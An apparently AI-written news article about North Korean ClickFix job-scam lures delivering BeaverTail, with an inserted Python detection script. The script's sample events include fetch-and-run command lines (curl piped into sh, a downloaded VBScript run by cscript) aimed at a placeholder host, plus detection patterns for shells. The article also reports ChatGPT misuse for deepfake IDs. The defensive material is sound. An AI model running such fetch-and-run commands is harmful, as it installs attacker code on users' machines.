

Ethical Hacking News

DPRK Hackers Employ ClickFix Malware to Deliver BeaverTail in Crypto Job Scams

A recent campaign by DPRK hackers has used ClickFix lures to deliver malware, specifically the notorious BeaverTail and InvisibleFerret. This article delves into how these hackers use this social engineering technique to scam victims out of their sensitive information.

The attackers have been targeting marketing and trader roles in cryptocurrency and retail sector organizations, using a fake hiring platform web application created using Vercel as a distribution vector for the malware. The BeaverTail variant associated with this campaign contains a simplified information stealer routine, targeting fewer browser extensions compared to previous variants.

This is just one example of how DPRK hackers are adapting their tactics to reach less technical targets and abuse trusted infrastructure. As with any threat, it's essential for users and organizations to remain vigilant and take proactive measures to protect themselves against such attacks.

  • North Korean hackers are using ClickFix lures to deliver malware, specifically the BeaverTail and InvisibleFerret threats.
  • The attackers target marketing and trader roles in cryptocurrency and retail sector organizations, expanding their scope beyond software development roles.
  • The malware is distributed through a fake hiring platform web application created using Vercel, which captures users' public IP addresses and leads to the execution of a shell script.
  • At least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025.
  • The attackers use ClickFix themes to distribute malicious Node.js applications that deploy malware disguised as updates or essential utilities.
  • The payload is tailored to the victim's operating system and system architecture, and it catalogs victim activities before triggering an email alert.



The world of cyber threats continues to evolve at an alarming rate, with hackers employing new tactics to outsmart their victims. One tactic that has gained attention recently is the use of ClickFix lures to deliver malware, specifically the notorious BeaverTail and InvisibleFerret. This article delves into how DPRK (Democratic People's Republic of Korea) hackers are using this social engineering technique to scam victims out of their sensitive information.

In a recent report, GitLab Threat Intelligence revealed that North Korean operatives have been leveraging ClickFix lures to target marketing and trader roles in cryptocurrency and retail sector organizations. This is a departure from the usual targeting of software development roles and suggests that the hackers are expanding their scope to reach less technical targets.

The malware in question, BeaverTail, has been linked to the Contagious Interview (aka Gwisin Gang) campaign, which was first exposed by Palo Alto Networks in late 2023. That campaign distributes malware to software developers under the pretext of a job assessment. The latest wave of attacks uses ClickFix lures to deliver BeaverTail, with a fake hiring platform web application created using Vercel serving as the distribution vector for the malware.

The attackers advertise cryptocurrency trader, sales, and marketing roles at various Web3 organizations, urging targets to invest in a Web3 company. Upon landing on the site, users' public IP addresses are captured, and they are instructed to complete a video assessment of themselves. A fake technical error about a non-existent microphone issue is then displayed, leading the victim to execute a shell script or Visual Basic Script, which ultimately delivers the malware.

The BeaverTail variant associated with this campaign contains a simplified information stealer routine, targeting fewer browser extensions compared to previous variants. Notably, the Windows version of BeaverTail relies on a password-protected archive shipped along with the malware to load Python dependencies related to InvisibleFerret.

This technique is not new, as threat actors have used trusted infrastructure for malicious purposes in the past. However, this particular campaign appears to be an adaptation of the attack vectors employed by other North Korean groups, such as the Kimsuky group and the Lazarus cluster.

A recent report by SentinelOne, SentinelLabs, and Validin revealed that at least 230 individuals have been targeted by the Contagious Interview campaign in fake cryptocurrency job interview attacks between January and March 2025. The attackers used ClickFix themes to distribute malicious Node.js applications dubbed ContagiousDrop that deployed malware disguised as updates or essential utilities.

The payload is tailored to the victim's operating system and system architecture, and it is also capable of cataloging victim activities and triggering an email alert when the affected individual starts the fake skill assessment. The attackers have been observed examining cyber threat intelligence (CTI) information related to their infrastructure and engaging in a coordinated effort to evaluate new infrastructure before acquisition.

This latest attack wave is significant not only because it employs ClickFix lures but also because it delivers the malware in the form of a compiled binary produced using tools like pkg and PyInstaller for Windows, macOS, and Linux systems. The attackers have refined their attack chains by using password-protected archives to load Python dependencies related to InvisibleFerret.

The use of trusted infrastructure for malicious purposes is a concerning trend, as it highlights the sophistication and adaptability of modern cyber threats. Defenders are advised to monitor traffic to api.github.com and the creation of suspicious scheduled tasks, which indicate persistence.
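
The detection advice above (watch traffic to api.github.com and the creation of suspicious scheduled tasks), together with the ClickFix execution step described earlier (a fake microphone error that leads the victim to run a shell script or Visual Basic Script), can be turned into a small triage pass over endpoint telemetry. The Python below is an added example, not code from the article or from GitLab, SentinelOne or Validin; the event format, the host and process names, the developer-tool allow-list and the regular expressions are all assumptions, and the sample events are constructed rather than real indicators.

```python
"""Toy detection pass over constructed endpoint telemetry.

Added example; not code from the article or from any vendor it names.
The event layout, name sets, allow-list and regexes are assumptions.
Three indicators are checked, each taken from the article:
  1. a shell or script host launched from a browser (the ClickFix
     "microphone error" lure ends in a shell script or VBScript run),
  2. traffic to api.github.com from a process that is not a dev tool,
  3. a scheduled task whose action lives in a user-writable directory.
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample telemetry (not real IoCs); one dict per event.
SAMPLE_EVENTS = [
    {"type": "process", "host": "ws-17", "parent": "chrome.exe", "image": "cmd.exe",
     "cmdline": "cmd.exe /c curl -s https://example.invalid/fix.vbs -o %TEMP%\\fix.vbs && cscript %TEMP%\\fix.vbs"},
    {"type": "process", "host": "ws-17", "parent": "explorer.exe", "image": "code.exe",
     "cmdline": "code.exe ."},
    {"type": "process", "host": "mac-04", "parent": "Safari", "image": "sh",
     "cmdline": 'sh -c "curl -fsSL https://example.invalid/setup.sh | sh"'},
    {"type": "network", "host": "ws-17", "image": "node.exe", "dest": "api.github.com", "port": 443},
    {"type": "network", "host": "ws-02", "image": "git.exe", "dest": "api.github.com", "port": 443},
    {"type": "network", "host": "ws-17", "image": "chrome.exe", "dest": "example.vercel.app", "port": 443},
    {"type": "schtask", "host": "ws-17", "task": "\\Microsoft\\Windows\\UpdateCheck",
     "action": "C:\\Users\\alice\\AppData\\Local\\Temp\\update\\update.exe"},
    {"type": "schtask", "host": "ws-02", "task": "\\Backup\\Nightly",
     "action": "C:\\Program Files\\Backup\\backup.exe"},
]

# Assumed name sets; a real deployment would take these from the EDR's own fields.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe", "brave.exe", "safari", "google chrome", "firefox"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "sh", "bash", "zsh", "osascript"}
DEV_TOOLS = {"git.exe", "git", "gh.exe", "gh", "code.exe", "code"}  # assumed allow-list for api.github.com
# Fetch tool followed by a pipe into a shell or by a script host: the classic paste-and-run shape.
DOWNLOAD_EXEC = re.compile(r"\b(curl|wget|invoke-webrequest|iwr)\b.*(\|\s*(sh|bash)\b|\b(cscript|wscript|iex)\b)", re.I)
# Directories a standard user can write to; a scheduled task pointing here deserves a look.
USER_WRITABLE = re.compile(r"(\\AppData\\|\\Temp\\|/tmp/|\\Users\\[^\\]+\\Downloads\\)", re.I)


@dataclass(frozen=True)
class Finding:
    host: str
    rule: str
    detail: str


def detect(events):
    """Return one Finding per (event, rule) pair that matches; events are plain dicts."""
    findings = []
    for ev in events:
        if ev["type"] == "process":
            parent, image = ev["parent"].lower(), ev["image"].lower()
            if parent in BROWSERS and image in SHELLS:
                findings.append(Finding(ev["host"], "shell_spawned_by_browser", ev["cmdline"]))
            if DOWNLOAD_EXEC.search(ev["cmdline"]):
                findings.append(Finding(ev["host"], "download_and_execute", ev["cmdline"]))
        elif ev["type"] == "network":
            if ev["dest"].lower() == "api.github.com" and ev["image"].lower() not in DEV_TOOLS:
                findings.append(Finding(ev["host"], "github_api_from_unexpected_process", ev["image"]))
        elif ev["type"] == "schtask":
            if USER_WRITABLE.search(ev["action"]):
                findings.append(Finding(ev["host"], "schtask_in_user_writable_path", f'{ev["task"]} -> {ev["action"]}'))
    return findings


def rule_counts(findings):
    """How many times each rule fired, as a plain dict."""
    return dict(Counter(f.rule for f in findings))


def hosts_by_hits(findings):
    """Hosts ordered by number of findings, most first; ties broken by name."""
    c = Counter(f.host for f in findings)
    return sorted(c.items(), key=lambda kv: (-kv[1], kv[0]))


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for f in hits:
        print(f"{f.host:7} {f.rule:36} {f.detail}")
    print(rule_counts(hits))
    print(hosts_by_hits(hits))
```

Run as a script it prints each finding and then the per-rule and per-host tallies; on the constructed sample, ws-17 accumulates hits across all three indicators, which is the correlation a triage analyst would act on. The api.github.com rule is the noisiest of the three, since legitimate Node.js tooling also talks to that API, so the allow-list needs tuning per fleet, and the scheduled-task rule is best paired with the task's creating process.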

Furthermore, this campaign raises questions about the effectiveness of cybersecurity measures in protecting against sophisticated social engineering tactics. The Kimsuky group's abuse of OpenAI's ChatGPT to forge deepfake military ID cards in a spear-phishing campaign against South Korean defense-affiliated entities and other individuals focused on North Korean affairs is another concerning trend.

Phishing emails using the military ID deepfake decoy were observed on July 17, 2025, following a series of ClickFix-based phishing campaigns between June 12 and 18. The multi-stage infection chain has been found to employ ClickFix-like CAPTCHA verification pages to deploy an AutoIt script that connects to an external server to run batch file commands issued by the attacker.

This is a real case demonstrating the Kimsuky group's application of deepfake technology, which poses significant risks to national security and individual privacy. As with any threat, it's essential for users and organizations to remain vigilant and take proactive measures to protect themselves against such attacks.

In conclusion, the DPRK hackers' use of ClickFix malware to deliver BeaverTail in crypto job scams highlights the evolving nature of cyber threats and the need for ongoing vigilance. Users must be aware of these tactics and take steps to protect themselves from falling prey to such sophisticated social engineering techniques.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/DPRK-Hackers-Employ-ClickFix-Malware-to-Deliver-BeaverTail-in-Crypto-Job-Scams-ehn.shtml

  • Published: Sun Sep 21 06:45:30 2025 by llama3.2 3B Q4_K_M
